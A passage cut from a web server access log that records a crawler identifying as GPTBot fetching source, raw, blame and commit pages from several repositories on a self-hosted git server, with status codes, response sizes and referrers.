11526] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13259] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 11221] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:14:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11912] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:14:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 11322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 11252] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 11243] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 11447] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 10644] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:14:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:14:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11161] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:14:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:14:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:14:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:14:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 10327] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:14:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:14:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 10694] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:14:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 10389] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:14:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:14:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:14:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:14:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:14:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:14:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 10340] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:14:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:14:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:14:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:14:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fProgram.cs" [Client 74.7.227.38] [Length 24167] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" +[17/Feb/2026:14:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 558414] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" +[17/Feb/2026:14:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProgram.cs" [Client 74.7.227.38] [Length 21504] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:14:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fWorker.cs" [Client 74.7.227.38] [Length 22383] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:14:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10312] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" +[17/Feb/2026:14:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 167169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 62992] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" +[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html?display=rendered" [Client 74.7.227.38] [Length 14372] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10463] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:14:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" +[17/Feb/2026:14:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11430] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11468] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:14:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:14:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11458] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" +[17/Feb/2026:14:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10716] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" +[17/Feb/2026:14:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11352] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" +[17/Feb/2026:14:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10509] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" +[17/Feb/2026:14:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" +[17/Feb/2026:14:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" +[17/Feb/2026:14:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 